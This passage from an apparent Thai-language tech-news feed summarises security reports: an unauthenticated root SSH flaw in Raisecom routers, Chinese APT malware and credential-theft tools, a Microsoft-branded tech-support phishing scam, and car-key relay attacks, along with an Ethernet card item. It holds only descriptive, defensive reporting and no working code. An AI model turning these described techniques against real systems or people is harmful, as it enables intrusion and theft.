    ใช้ firewall เพื่อจำกัดการเข้าถึงจากภายนอก
    ใช้ VPN ที่ปลอดภัยและอัปเดตอยู่เสมอ
    ตรวจสอบการเชื่อมต่อ SSH ที่ไม่ได้รับอนุญาต
    เฝ้าระวังพฤติกรรมผิดปกติจากอุปกรณ์ Raisecom

    https://securityonline.info/cisa-warns-critical-raisecom-router-flaw-cve-2025-11534-cvss-9-8-allows-unauthenticated-root-ssh-access/
    🚨 “CISA เตือนช่องโหว่ Raisecom RAX701-GC – SSH เข้า root ได้โดยไม่ต้องยืนยันตัวตน!” CISA ออกประกาศเตือนช่องโหว่ร้ายแรงในเราเตอร์ Raisecom รุ่น RAX701-GC ที่ใช้ในระบบอุตสาหกรรมและโทรคมนาคม โดยช่องโหว่นี้มีรหัสว่า CVE-2025-11534 และได้คะแนน CVSS สูงถึง 9.8 ซึ่งถือว่า “วิกฤต” เพราะเปิดให้ผู้โจมตีสามารถเข้าถึง shell ของระบบด้วยสิทธิ์ root โดยไม่ต้องยืนยันตัวตนผ่าน SSH เลย ช่องโหว่นี้เกิดจากการที่อุปกรณ์อนุญาตให้สร้าง session SSH ได้โดยไม่ต้องผ่านขั้นตอนการยืนยันตัวตน ซึ่งผิดหลักการของระบบความปลอดภัยอย่างร้ายแรง โดย CISA จัดช่องโหว่นี้ไว้ในหมวด CWE-288: Authentication Bypass Using an Alternate Path or Channel อุปกรณ์ที่ได้รับผลกระทบคือ Raisecom RAX701-GC-WP-01 ที่ใช้ firmware เวอร์ชัน P200R002C52 และ P200R002C53 ซึ่งรวมถึงเวอร์ชัน 5.5.13_20180720, 5.5.27_20190111 และ 5.5.36_20190709 ช่องโหว่นี้ถูกค้นพบโดย HD Moore และ Tod Beardsley จาก runZero และถูกแจ้งไปยัง CISA เพื่อเปิดเผยอย่างเป็นทางการ แต่ทาง Raisecom ยังไม่ตอบรับหรือออกแพตช์ใด ๆ ทำให้ผู้ดูแลระบบต้องใช้วิธีป้องกันเชิงเครือข่าย เช่น segmentation และ firewall เพื่อจำกัดการเข้าถึง แม้ยังไม่มีรายงานการโจมตีจริง แต่ CISA เตือนว่าเนื่องจากช่องโหว่นี้สามารถใช้จากระยะไกลได้ง่าย และให้สิทธิ์สูงสุด จึงควรรีบดำเนินการป้องกันทันที ✅ รายละเอียดช่องโหว่ CVE-2025-11534 ➡️ เกิดจากการ bypass authentication ใน SSH ➡️ ผู้โจมตีสามารถเข้าถึง shell ด้วยสิทธิ์ root โดยไม่ต้อง login ➡️ ได้คะแนน CVSS v3.1 สูงถึง 9.8 ➡️ จัดอยู่ในหมวด CWE-288 โดย CISA ➡️ ส่งผลกระทบต่อ Raisecom RAX701-GC-WP-01 firmware หลายเวอร์ชัน ✅ การค้นพบและการเปิดเผย ➡️ ค้นพบโดย HD Moore และ Tod Beardsley จาก runZero ➡️ แจ้งไปยัง CISA เพื่อเปิดเผยอย่างเป็นทางการ ➡️ Raisecom ยังไม่ตอบรับหรือออกแพตช์ใด ๆ ➡️ ผู้ดูแลระบบต้องใช้วิธีป้องกันเชิงเครือข่ายแทน ✅ แนวทางการป้องกันจาก CISA ➡️ แยกเครือข่ายควบคุมออกจากเครือข่ายธุรกิจ ➡️ ใช้ firewall เพื่อจำกัดการเข้าถึงจากภายนอก ➡️ ใช้ VPN ที่ปลอดภัยและอัปเดตอยู่เสมอ ➡️ ตรวจสอบการเชื่อมต่อ SSH ที่ไม่ได้รับอนุญาต ➡️ เฝ้าระวังพฤติกรรมผิดปกติจากอุปกรณ์ Raisecom https://securityonline.info/cisa-warns-critical-raisecom-router-flaw-cve-2025-11534-cvss-9-8-allows-unauthenticated-root-ssh-access/
    SECURITYONLINE.INFO
    CISA Warns: Critical Raisecom Router Flaw (CVE-2025-11534, CVSS 9.8) Allows Unauthenticated Root SSH Access
    CISA issued an alert for a Critical (CVSS 9.8) Auth Bypass flaw (CVE-2025-11534) in Raisecom RAX701-GC routers, allowing unauthenticated root shell via SSH. The vendor has not yet responded with a patch.
    0 Comments 0 Shares 132 Views 0 Reviews
  • “Symantec แฉแคมเปญจารกรรมจีน – ใช้ Zingdoor, ShadowPad และ KrustyLoader เจาะหน่วยงานทั่วโลก!”

    Symantec เปิดเผยแคมเปญจารกรรมไซเบอร์ระดับโลกที่มีความเชื่อมโยงกับกลุ่ม APT ของจีนหลายกลุ่ม โดยพบการใช้เครื่องมือมัลแวร์ที่ซับซ้อน ได้แก่ Zingdoor, ShadowPad และ KrustyLoader ซึ่งเคยถูกใช้โดยกลุ่ม Glowworm (Earth Estries) และ UNC5221 มาก่อน

    แคมเปญนี้เจาะระบบของหน่วยงานรัฐบาลในอเมริกาใต้และมหาวิทยาลัยในสหรัฐฯ โดยใช้ช่องโหว่ใน SQL Server และ Apache HTTP เป็นจุดเริ่มต้น จากนั้นฝัง DLL อันตรายผ่าน binary ที่ดูเหมือนซอฟต์แวร์ของ Symantec เพื่อหลบการตรวจจับ

    Zingdoor เป็น backdoor ที่เขียนด้วย Go สามารถเก็บข้อมูลระบบ, อัปโหลด/ดาวน์โหลดไฟล์ และรันคำสั่งได้ โดยถูก sideload ผ่าน binary ของ Trend Micro เพื่อให้ดูเหมือนโปรแกรมปกติ

    ShadowPad เป็น Remote Access Trojan (RAT) แบบ modular ที่สามารถโหลดโมดูลใหม่ได้ตามต้องการ ใช้ DLL sideloading เพื่อซ่อนตัว และถูกใช้โดยหลายกลุ่ม APT ของจีน เช่น APT41, Blackfly และ Grayfly

    KrustyLoader เป็น dropper ที่เขียนด้วย Rust มีฟีเจอร์ anti-analysis และ self-delete ก่อนจะโหลด payload ขั้นที่สอง เช่น Sliver C2 framework ซึ่งใช้ควบคุมระบบจากระยะไกล

    นอกจากมัลแวร์เฉพาะทางแล้ว แฮกเกอร์ยังใช้เครื่องมือทั่วไปของ Windows เช่น Certutil, Procdump, Revsocks และ PetitPotam เพื่อขโมย credentials และยกระดับสิทธิ์ในระบบ

    Symantec ระบุว่าการโจมตีนี้เกี่ยวข้องกับการใช้ช่องโหว่ ToolShell ที่ Microsoft เคยรายงาน โดยพบว่ามีการใช้จากกลุ่มอื่นนอกเหนือจาก Budworm, Sheathminer และ Storm-2603 ซึ่งแสดงให้เห็นถึง ecosystem การโจมตีที่กว้างกว่าที่เคยคิด

    เครื่องมือมัลแวร์ที่ใช้ในแคมเปญ
    Zingdoor – backdoor เขียนด้วย Go ใช้ sideload ผ่าน Trend Micro
    ShadowPad – modular RAT ที่โหลดโมดูลใหม่ได้ ใช้ DLL sideloading
    KrustyLoader – Rust-based dropper ที่โหลด Sliver C2 framework
    ใช้เครื่องมือทั่วไปของ Windows เช่น Certutil, Revsocks, Procdump
    ใช้ PetitPotam เพื่อขโมย credentials จาก domain controller

    กลุ่ม APT ที่เกี่ยวข้อง
    Glowworm (Earth Estries), FamousSparrow
    UNC5221 – กลุ่มที่มีความเชื่อมโยงกับจีน
    APT41, Blackfly, Grayfly – ใช้ ShadowPad
    REF3927 – กลุ่มใหม่ที่ใช้ ToolShell ร่วมกับกลุ่มอื่น

    เป้าหมายของการโจมตี
    หน่วยงานรัฐบาลในอเมริกาใต้
    มหาวิทยาลัยในสหรัฐฯ
    ระบบ SharePoint ที่มีช่องโหว่
    เป้าหมายเชิงยุทธศาสตร์ที่มีข้อมูลสำคัญ
    สร้างการเข้าถึงระยะยาวและขโมยข้อมูลอย่างต่อเนื่อง

    https://securityonline.info/symantec-exposes-chinese-apt-overlap-zingdoor-shadowpad-and-krustyloader-used-in-global-espionage/
    🕵️‍♀️ “Symantec แฉแคมเปญจารกรรมจีน – ใช้ Zingdoor, ShadowPad และ KrustyLoader เจาะหน่วยงานทั่วโลก!” Symantec เปิดเผยแคมเปญจารกรรมไซเบอร์ระดับโลกที่มีความเชื่อมโยงกับกลุ่ม APT ของจีนหลายกลุ่ม โดยพบการใช้เครื่องมือมัลแวร์ที่ซับซ้อน ได้แก่ Zingdoor, ShadowPad และ KrustyLoader ซึ่งเคยถูกใช้โดยกลุ่ม Glowworm (Earth Estries) และ UNC5221 มาก่อน แคมเปญนี้เจาะระบบของหน่วยงานรัฐบาลในอเมริกาใต้และมหาวิทยาลัยในสหรัฐฯ โดยใช้ช่องโหว่ใน SQL Server และ Apache HTTP เป็นจุดเริ่มต้น จากนั้นฝัง DLL อันตรายผ่าน binary ที่ดูเหมือนซอฟต์แวร์ของ Symantec เพื่อหลบการตรวจจับ Zingdoor เป็น backdoor ที่เขียนด้วย Go สามารถเก็บข้อมูลระบบ, อัปโหลด/ดาวน์โหลดไฟล์ และรันคำสั่งได้ โดยถูก sideload ผ่าน binary ของ Trend Micro เพื่อให้ดูเหมือนโปรแกรมปกติ ShadowPad เป็น Remote Access Trojan (RAT) แบบ modular ที่สามารถโหลดโมดูลใหม่ได้ตามต้องการ ใช้ DLL sideloading เพื่อซ่อนตัว และถูกใช้โดยหลายกลุ่ม APT ของจีน เช่น APT41, Blackfly และ Grayfly KrustyLoader เป็น dropper ที่เขียนด้วย Rust มีฟีเจอร์ anti-analysis และ self-delete ก่อนจะโหลด payload ขั้นที่สอง เช่น Sliver C2 framework ซึ่งใช้ควบคุมระบบจากระยะไกล นอกจากมัลแวร์เฉพาะทางแล้ว แฮกเกอร์ยังใช้เครื่องมือทั่วไปของ Windows เช่น Certutil, Procdump, Revsocks และ PetitPotam เพื่อขโมย credentials และยกระดับสิทธิ์ในระบบ Symantec ระบุว่าการโจมตีนี้เกี่ยวข้องกับการใช้ช่องโหว่ ToolShell ที่ Microsoft เคยรายงาน โดยพบว่ามีการใช้จากกลุ่มอื่นนอกเหนือจาก Budworm, Sheathminer และ Storm-2603 ซึ่งแสดงให้เห็นถึง ecosystem การโจมตีที่กว้างกว่าที่เคยคิด ✅ เครื่องมือมัลแวร์ที่ใช้ในแคมเปญ ➡️ Zingdoor – backdoor เขียนด้วย Go ใช้ sideload ผ่าน Trend Micro ➡️ ShadowPad – modular RAT ที่โหลดโมดูลใหม่ได้ ใช้ DLL sideloading ➡️ KrustyLoader – Rust-based dropper ที่โหลด Sliver C2 framework ➡️ ใช้เครื่องมือทั่วไปของ Windows เช่น Certutil, Revsocks, Procdump ➡️ ใช้ PetitPotam เพื่อขโมย credentials จาก domain controller ✅ กลุ่ม APT ที่เกี่ยวข้อง ➡️ Glowworm (Earth Estries), FamousSparrow ➡️ UNC5221 – กลุ่มที่มีความเชื่อมโยงกับจีน ➡️ APT41, Blackfly, Grayfly – ใช้ ShadowPad ➡️ REF3927 – กลุ่มใหม่ที่ใช้ ToolShell ร่วมกับกลุ่มอื่น ✅ เป้าหมายของการโจมตี ➡️ หน่วยงานรัฐบาลในอเมริกาใต้ ➡️ มหาวิทยาลัยในสหรัฐฯ ➡️ ระบบ SharePoint ที่มีช่องโหว่ ➡️ เป้าหมายเชิงยุทธศาสตร์ที่มีข้อมูลสำคัญ ➡️ สร้างการเข้าถึงระยะยาวและขโมยข้อมูลอย่างต่อเนื่อง https://securityonline.info/symantec-exposes-chinese-apt-overlap-zingdoor-shadowpad-and-krustyloader-used-in-global-espionage/
    SECURITYONLINE.INFO
    Symantec Exposes Chinese APT Overlap: Zingdoor, ShadowPad, and KrustyLoader Used in Global Espionage
    Symantec exposed a complex Chinese APT network (Glowworm/UNC5221) deploying Zingdoor and ShadowPad across US/South American targets. The groups abuse DLL sideloading and PetitPotam for credential theft.
    0 Comments 0 Shares 147 Views 0 Reviews
  • “อีเมลปลอมจาก Microsoft กำลังหลอกผู้ใช้ให้โทรหาแก๊งหลอกลวง — เมื่อแบรนด์ที่น่าเชื่อถือกลายเป็นเครื่องมือโจมตี” — เมื่อความคุ้นเคยกลายเป็นช่องโหว่ และ CAPTCHA ปลอมคือด่านแรกของการหลอกลวง

    รายงานจาก Cofense Phishing Defense Center เผยว่าอาชญากรไซเบอร์กำลังใช้แบรนด์ Microsoft ซึ่งผู้ใช้คุ้นเคยและไว้วางใจ เป็นเครื่องมือในการหลอกลวงผ่านแคมเปญ phishing ที่ซับซ้อน โดยเริ่มจากอีเมลที่ดูเหมือนมาจากบริษัทจริง เช่น บริษัทเช่ารถ อ้างว่ามีเงินคืนรอการยืนยัน

    เมื่อเหยื่อคลิกลิงก์ในอีเมล จะถูกนำไปยังหน้า CAPTCHA ปลอมที่ดูเหมือนจริง เพื่อหลอกให้ผู้ใช้มีส่วนร่วมและหลีกเลี่ยงการตรวจจับจากระบบอัตโนมัติ หลังจากนั้นจะเข้าสู่หน้าที่จำลองอินเทอร์เฟซของ Microsoft ซึ่งล็อกเบราว์เซอร์ของผู้ใช้ พร้อมแสดงข้อความว่า “ระบบถูกโจมตี” และทำให้เมาส์ไม่ตอบสนอง

    ในภาวะตื่นตระหนก ผู้ใช้จะเห็นเบอร์โทรศัพท์ “Microsoft Support” ปลอมปรากฏขึ้น และเมื่อโทรไปจะถูกเชื่อมต่อกับแก๊งหลอกลวงที่แอบอ้างเป็นเจ้าหน้าที่ Microsoft ซึ่งจะพยายามขอข้อมูลส่วนตัว, รหัสผ่าน, หรือให้ติดตั้งโปรแกรมควบคุมระยะไกลเพื่อขโมยข้อมูลหรือเงิน

    Cofense เตือนว่าแคมเปญนี้ไม่ได้อาศัยช่องโหว่ทางเทคนิค แต่ใช้ “จิตวิทยา” และ “ความคุ้นเคย” เป็นอาวุธ โดยสร้างสถานการณ์ให้ผู้ใช้รู้สึกว่าต้องรีบแก้ไขปัญหา

    อาชญากรไซเบอร์ใช้แบรนด์ Microsoft เป็นเครื่องมือหลอกลวง
    เพราะผู้ใช้คุ้นเคยและไว้วางใจแบรนด์นี้

    เริ่มต้นด้วยอีเมลปลอมจากบริษัทที่ดูน่าเชื่อถือ เช่น บริษัทเช่ารถ
    อ้างว่ามีเงินคืนรอการยืนยัน

    ลิงก์ในอีเมลนำไปสู่หน้า CAPTCHA ปลอม
    เพื่อหลอกให้ผู้ใช้มีส่วนร่วมและหลีกเลี่ยงการตรวจจับ

    หน้าถัดไปจำลองอินเทอร์เฟซ Microsoft และล็อกเบราว์เซอร์
    พร้อมแสดงข้อความว่า “ระบบถูกโจมตี” และทำให้เมาส์ไม่ตอบสนอง

    แสดงเบอร์โทร “Microsoft Support” ปลอมเพื่อให้เหยื่อโทรหา
    แล้วหลอกให้ให้ข้อมูลหรือติดตั้งโปรแกรมควบคุมระยะไกล

    Cofense เตือนว่าแคมเปญนี้ใช้จิตวิทยาเป็นหลัก
    ไม่ใช่การเจาะระบบ แต่เป็นการหลอกให้ผู้ใช้ตื่นตระหนก

    https://www.techradar.com/pro/phone-communications/microsofts-fantastic-branding-power-is-being-used-by-criminals-to-funnel-victims-to-tech-support-scam-centers-heres-what-you-need-to-know
    🕵️‍♂️ “อีเมลปลอมจาก Microsoft กำลังหลอกผู้ใช้ให้โทรหาแก๊งหลอกลวง — เมื่อแบรนด์ที่น่าเชื่อถือกลายเป็นเครื่องมือโจมตี” — เมื่อความคุ้นเคยกลายเป็นช่องโหว่ และ CAPTCHA ปลอมคือด่านแรกของการหลอกลวง รายงานจาก Cofense Phishing Defense Center เผยว่าอาชญากรไซเบอร์กำลังใช้แบรนด์ Microsoft ซึ่งผู้ใช้คุ้นเคยและไว้วางใจ เป็นเครื่องมือในการหลอกลวงผ่านแคมเปญ phishing ที่ซับซ้อน โดยเริ่มจากอีเมลที่ดูเหมือนมาจากบริษัทจริง เช่น บริษัทเช่ารถ อ้างว่ามีเงินคืนรอการยืนยัน เมื่อเหยื่อคลิกลิงก์ในอีเมล จะถูกนำไปยังหน้า CAPTCHA ปลอมที่ดูเหมือนจริง เพื่อหลอกให้ผู้ใช้มีส่วนร่วมและหลีกเลี่ยงการตรวจจับจากระบบอัตโนมัติ หลังจากนั้นจะเข้าสู่หน้าที่จำลองอินเทอร์เฟซของ Microsoft ซึ่งล็อกเบราว์เซอร์ของผู้ใช้ พร้อมแสดงข้อความว่า “ระบบถูกโจมตี” และทำให้เมาส์ไม่ตอบสนอง ในภาวะตื่นตระหนก ผู้ใช้จะเห็นเบอร์โทรศัพท์ “Microsoft Support” ปลอมปรากฏขึ้น และเมื่อโทรไปจะถูกเชื่อมต่อกับแก๊งหลอกลวงที่แอบอ้างเป็นเจ้าหน้าที่ Microsoft ซึ่งจะพยายามขอข้อมูลส่วนตัว, รหัสผ่าน, หรือให้ติดตั้งโปรแกรมควบคุมระยะไกลเพื่อขโมยข้อมูลหรือเงิน Cofense เตือนว่าแคมเปญนี้ไม่ได้อาศัยช่องโหว่ทางเทคนิค แต่ใช้ “จิตวิทยา” และ “ความคุ้นเคย” เป็นอาวุธ โดยสร้างสถานการณ์ให้ผู้ใช้รู้สึกว่าต้องรีบแก้ไขปัญหา ✅ อาชญากรไซเบอร์ใช้แบรนด์ Microsoft เป็นเครื่องมือหลอกลวง ➡️ เพราะผู้ใช้คุ้นเคยและไว้วางใจแบรนด์นี้ ✅ เริ่มต้นด้วยอีเมลปลอมจากบริษัทที่ดูน่าเชื่อถือ เช่น บริษัทเช่ารถ ➡️ อ้างว่ามีเงินคืนรอการยืนยัน ✅ ลิงก์ในอีเมลนำไปสู่หน้า CAPTCHA ปลอม ➡️ เพื่อหลอกให้ผู้ใช้มีส่วนร่วมและหลีกเลี่ยงการตรวจจับ ✅ หน้าถัดไปจำลองอินเทอร์เฟซ Microsoft และล็อกเบราว์เซอร์ ➡️ พร้อมแสดงข้อความว่า “ระบบถูกโจมตี” และทำให้เมาส์ไม่ตอบสนอง ✅ แสดงเบอร์โทร “Microsoft Support” ปลอมเพื่อให้เหยื่อโทรหา ➡️ แล้วหลอกให้ให้ข้อมูลหรือติดตั้งโปรแกรมควบคุมระยะไกล ✅ Cofense เตือนว่าแคมเปญนี้ใช้จิตวิทยาเป็นหลัก ➡️ ไม่ใช่การเจาะระบบ แต่เป็นการหลอกให้ผู้ใช้ตื่นตระหนก https://www.techradar.com/pro/phone-communications/microsofts-fantastic-branding-power-is-being-used-by-criminals-to-funnel-victims-to-tech-support-scam-centers-heres-what-you-need-to-know
    WWW.TECHRADAR.COM
    The Microsoft logo you trust could now be a trap
    Cybercriminals are transforming brand familiarity into a weapon of deception
    0 Comments 0 Shares 119 Views 0 Reviews
  • “Broadcom Thor Ultra 800G: การ์ด Ethernet ที่เร็วที่สุดในโลกเพื่อยุค AI”

    Broadcom เปิดตัว Thor Ultra 800G NIC ซึ่งเป็นการ์ด Ethernet ที่เร็วที่สุดเท่าที่เคยมีมา โดยออกแบบมาเพื่อรองรับงานในศูนย์ข้อมูล AI ขนาดใหญ่ที่ต้องการประสิทธิภาพสูงสุดในการประมวลผลข้อมูลระดับหลายแสน XPU

    การ์ดนี้ใช้ PCIe Gen6 x16 ซึ่งเป็นอินเทอร์เฟซที่เร็วที่สุดในตลาดปัจจุบัน พร้อมรองรับฟีเจอร์ล้ำ ๆ เช่น Packet-Level Multipathing, Out-of-Order Packet Delivery และ Selective Retransmission ที่ช่วยลด latency และเพิ่มความเสถียรในการส่งข้อมูล

    Thor Ultra ยังใช้มาตรฐานเปิดจาก Ultra Ethernet Consortium (UEC) ทำให้สามารถใช้งานร่วมกับอุปกรณ์จากหลายผู้ผลิตได้โดยไม่ต้องผูกขาดกับระบบเฉพาะของ Broadcom

    สเปกและเทคโนโลยีของ Thor Ultra 800G
    ใช้ PCIe Gen6 x16 เพื่อความเร็วสูงสุดในการส่งข้อมูล
    รองรับ 200G และ 100G PAM4 SerDes พร้อมสายทองแดงแบบ passive ระยะไกล
    มี bit error rate ต่ำมาก ลดความไม่เสถียรของการเชื่อมต่อ

    ฟีเจอร์ใหม่ที่โดดเด่น
    Packet-Level Multipathing: ส่งข้อมูลหลายเส้นทางพร้อมกัน
    Out-of-Order Packet Delivery: รับข้อมูลที่ไม่เรียงลำดับได้
    Selective Retransmission: ส่งเฉพาะแพ็กเก็ตที่เสียหายใหม่
    Programmable Congestion Control: ปรับการควบคุมความแออัดของเครือข่ายได้

    ความปลอดภัยและความยืดหยุ่น
    รองรับ line-rate encryption/decryption ด้วย PSP offload
    มี secure boot และ signed firmware เพื่อความปลอดภัย
    ใช้มาตรฐานเปิดจาก UEC ไม่ผูกขาดกับระบบเฉพาะ

    การใช้งานในศูนย์ข้อมูล AI
    ออกแบบมาเพื่อใช้งานใน data center ที่มี XPU จำนวนมาก
    รองรับการทำงานร่วมกับ Broadcom Tomahawk 5/6 และ Jericho 4
    เป็นส่วนหนึ่งของกลยุทธ์ Ethernet AI Networking ของ Broadcom

    คำเตือนและข้อจำกัด
    ยังอยู่ในช่วง sampling เท่านั้น ยังไม่วางจำหน่ายทั่วไป
    การใช้งานอาจต้องปรับระบบให้รองรับ PCIe Gen6 และมาตรฐานใหม่
    การ์ดนี้ออกแบบมาเฉพาะสำหรับศูนย์ข้อมูล AI ไม่เหมาะกับการใช้งานทั่วไป

    https://www.techradar.com/pro/this-is-the-fastest-ethernet-card-ever-produced-broadcom-thor-ultra-800g-nic-uses-pcie-gen6-x16-and-will-only-be-used-in-ai-datacenters
    🚀 “Broadcom Thor Ultra 800G: การ์ด Ethernet ที่เร็วที่สุดในโลกเพื่อยุค AI” Broadcom เปิดตัว Thor Ultra 800G NIC ซึ่งเป็นการ์ด Ethernet ที่เร็วที่สุดเท่าที่เคยมีมา โดยออกแบบมาเพื่อรองรับงานในศูนย์ข้อมูล AI ขนาดใหญ่ที่ต้องการประสิทธิภาพสูงสุดในการประมวลผลข้อมูลระดับหลายแสน XPU การ์ดนี้ใช้ PCIe Gen6 x16 ซึ่งเป็นอินเทอร์เฟซที่เร็วที่สุดในตลาดปัจจุบัน พร้อมรองรับฟีเจอร์ล้ำ ๆ เช่น Packet-Level Multipathing, Out-of-Order Packet Delivery และ Selective Retransmission ที่ช่วยลด latency และเพิ่มความเสถียรในการส่งข้อมูล Thor Ultra ยังใช้มาตรฐานเปิดจาก Ultra Ethernet Consortium (UEC) ทำให้สามารถใช้งานร่วมกับอุปกรณ์จากหลายผู้ผลิตได้โดยไม่ต้องผูกขาดกับระบบเฉพาะของ Broadcom ✅ สเปกและเทคโนโลยีของ Thor Ultra 800G ➡️ ใช้ PCIe Gen6 x16 เพื่อความเร็วสูงสุดในการส่งข้อมูล ➡️ รองรับ 200G และ 100G PAM4 SerDes พร้อมสายทองแดงแบบ passive ระยะไกล ➡️ มี bit error rate ต่ำมาก ลดความไม่เสถียรของการเชื่อมต่อ ✅ ฟีเจอร์ใหม่ที่โดดเด่น ➡️ Packet-Level Multipathing: ส่งข้อมูลหลายเส้นทางพร้อมกัน ➡️ Out-of-Order Packet Delivery: รับข้อมูลที่ไม่เรียงลำดับได้ ➡️ Selective Retransmission: ส่งเฉพาะแพ็กเก็ตที่เสียหายใหม่ ➡️ Programmable Congestion Control: ปรับการควบคุมความแออัดของเครือข่ายได้ ✅ ความปลอดภัยและความยืดหยุ่น ➡️ รองรับ line-rate encryption/decryption ด้วย PSP offload ➡️ มี secure boot และ signed firmware เพื่อความปลอดภัย ➡️ ใช้มาตรฐานเปิดจาก UEC ไม่ผูกขาดกับระบบเฉพาะ ✅ การใช้งานในศูนย์ข้อมูล AI ➡️ ออกแบบมาเพื่อใช้งานใน data center ที่มี XPU จำนวนมาก ➡️ รองรับการทำงานร่วมกับ Broadcom Tomahawk 5/6 และ Jericho 4 ➡️ เป็นส่วนหนึ่งของกลยุทธ์ Ethernet AI Networking ของ Broadcom ‼️ คำเตือนและข้อจำกัด ⛔ ยังอยู่ในช่วง sampling เท่านั้น ยังไม่วางจำหน่ายทั่วไป ⛔ การใช้งานอาจต้องปรับระบบให้รองรับ PCIe Gen6 และมาตรฐานใหม่ ⛔ การ์ดนี้ออกแบบมาเฉพาะสำหรับศูนย์ข้อมูล AI ไม่เหมาะกับการใช้งานทั่วไป https://www.techradar.com/pro/this-is-the-fastest-ethernet-card-ever-produced-broadcom-thor-ultra-800g-nic-uses-pcie-gen6-x16-and-will-only-be-used-in-ai-datacenters
    WWW.TECHRADAR.COM
    Broadcom’s Thor Ultra just made PCIe Gen6 Ethernet real for AI tools
    Thor Ultra’s open UEC standard opens new paths for multi-vendor network systems
    0 Comments 0 Shares 162 Views 0 Reviews
  • "ไมโครเวฟกันขโมยรถ? เทคนิคที่ใช้ได้จริงแต่เสี่ยงพังทั้งบ้าน"

    ในยุคที่รถยนต์อัจฉริยะกลายเป็นเป้าหมายใหม่ของโจรไซเบอร์ “Relay Attack” คือเทคนิคที่ใช้กันอย่างแพร่หลายในการขโมยรถที่มีระบบ Keyless Entry โดยการขยายสัญญาณจากกุญแจรถที่อยู่ในบ้านไปยังรถยนต์ ทำให้สามารถปลดล็อกรถได้โดยไม่ต้องมีตัวกุญแจอยู่ใกล้รถเลย

    หนึ่งในวิธีที่ถูกพูดถึงมากคือการนำกุญแจรถไปเก็บไว้ในไมโครเวฟ ซึ่งทำหน้าที่คล้าย “Faraday Cage” หรือกรงป้องกันคลื่นแม่เหล็กไฟฟ้า ที่สามารถบล็อกสัญญาณจากกุญแจไม่ให้ถูกขยายออกไปได้ วิธีนี้แม้จะได้ผลจริง แต่ก็มีข้อเสียร้ายแรง—ถ้าลืมว่ากุญแจอยู่ในไมโครเวฟแล้วเผลอเปิดเครื่องตอนอุ่นอาหาร คุณอาจจะต้องซื้อไมโครเวฟใหม่พร้อมกุญแจรถอีกชุดทันที

    ความเข้าใจเรื่อง Relay Attack
    เป็นการขยายสัญญาณจากกุญแจรถไปยังรถยนต์เพื่อปลดล็อกจากระยะไกล
    ใช้ได้แม้กุญแจจะอยู่ในบ้าน และใช้เวลาเพียงไม่กี่วินาที

    ไมโครเวฟในฐานะ Faraday Cage
    โครงสร้างโลหะของไมโครเวฟสามารถบล็อกสัญญาณจากกุญแจได้
    เป็นวิธีที่ได้ผลในการป้องกัน Relay Attack

    คำเตือนเกี่ยวกับการใช้ไมโครเวฟ
    หากลืมว่ากุญแจอยู่ในไมโครเวฟแล้วเปิดเครื่อง จะทำให้กุญแจและไมโครเวฟเสียหายทันที
    ความร้อนและไฟฟ้าจะทำลายแบตเตอรี่และวงจรของกุญแจ
    พลาสติกของกุญแจจะละลายจากความร้อน

    ทางเลือกที่ปลอดภัยกว่า
    ใช้ Faraday Bag สำหรับเก็บกุญแจโดยเฉพาะ ราคาเริ่มต้นเพียง $9.99
    รุ่นที่กันไฟและน้ำมีราคาเพียง $14.99
    เก็บกุญแจไว้ในช่องแช่แข็งก็ช่วยลดสัญญาณได้ แม้จะมีความเสี่ยงต่อความเย็น
    วางกุญแจไว้ในห้องชั้นบน ห่างจากหน้าต่าง ก็ช่วยลดโอกาสถูกขยายสัญญาณ
    ใช้ล็อกพวงมาลัยแบบเก่าเพื่อเพิ่มความปลอดภัย

    คำเตือนเพิ่มเติม
    ช่องแช่แข็งอาจทำให้แบตเตอรี่กุญแจเสียหายจากความเย็น
    การใช้ฟอยล์ห่อกุญแจอาจได้ผล แต่ไม่มั่นคงเท่ากระเป๋า Faraday
    การพึ่งพาวิธี DIY โดยไม่เข้าใจความเสี่ยง อาจนำไปสู่ความเสียหายทางทรัพย์สิน

    สาระเพิ่มเติมจากภายนอก:

    หลักการของ Faraday Cage
    เป็นโครงสร้างที่ป้องกันคลื่นแม่เหล็กไฟฟ้าไม่ให้เข้าออก
    ใช้ในงานวิทยาศาสตร์ การแพทย์ และความปลอดภัยไซเบอร์

    แนวโน้มการออกแบบกุญแจรถในอนาคต
    ผู้ผลิตเริ่มพัฒนาเทคโนโลยี anti-relay ในกุญแจรุ่นใหม่
    การใช้ Bluetooth Low Energy และระบบยืนยันตัวตนหลายชั้นจะช่วยลดความเสี่ยง

    https://www.slashgear.com/1997582/vehicle-theft-prevention-microwave-hack-warning/
    🚗 "ไมโครเวฟกันขโมยรถ? เทคนิคที่ใช้ได้จริงแต่เสี่ยงพังทั้งบ้าน" ในยุคที่รถยนต์อัจฉริยะกลายเป็นเป้าหมายใหม่ของโจรไซเบอร์ “Relay Attack” คือเทคนิคที่ใช้กันอย่างแพร่หลายในการขโมยรถที่มีระบบ Keyless Entry โดยการขยายสัญญาณจากกุญแจรถที่อยู่ในบ้านไปยังรถยนต์ ทำให้สามารถปลดล็อกรถได้โดยไม่ต้องมีตัวกุญแจอยู่ใกล้รถเลย หนึ่งในวิธีที่ถูกพูดถึงมากคือการนำกุญแจรถไปเก็บไว้ในไมโครเวฟ ซึ่งทำหน้าที่คล้าย “Faraday Cage” หรือกรงป้องกันคลื่นแม่เหล็กไฟฟ้า ที่สามารถบล็อกสัญญาณจากกุญแจไม่ให้ถูกขยายออกไปได้ วิธีนี้แม้จะได้ผลจริง แต่ก็มีข้อเสียร้ายแรง—ถ้าลืมว่ากุญแจอยู่ในไมโครเวฟแล้วเผลอเปิดเครื่องตอนอุ่นอาหาร คุณอาจจะต้องซื้อไมโครเวฟใหม่พร้อมกุญแจรถอีกชุดทันที ✅ ความเข้าใจเรื่อง Relay Attack ➡️ เป็นการขยายสัญญาณจากกุญแจรถไปยังรถยนต์เพื่อปลดล็อกจากระยะไกล ➡️ ใช้ได้แม้กุญแจจะอยู่ในบ้าน และใช้เวลาเพียงไม่กี่วินาที ✅ ไมโครเวฟในฐานะ Faraday Cage ➡️ โครงสร้างโลหะของไมโครเวฟสามารถบล็อกสัญญาณจากกุญแจได้ ➡️ เป็นวิธีที่ได้ผลในการป้องกัน Relay Attack ‼️ คำเตือนเกี่ยวกับการใช้ไมโครเวฟ ⛔ หากลืมว่ากุญแจอยู่ในไมโครเวฟแล้วเปิดเครื่อง จะทำให้กุญแจและไมโครเวฟเสียหายทันที ⛔ ความร้อนและไฟฟ้าจะทำลายแบตเตอรี่และวงจรของกุญแจ ⛔ พลาสติกของกุญแจจะละลายจากความร้อน ✅ ทางเลือกที่ปลอดภัยกว่า ➡️ ใช้ Faraday Bag 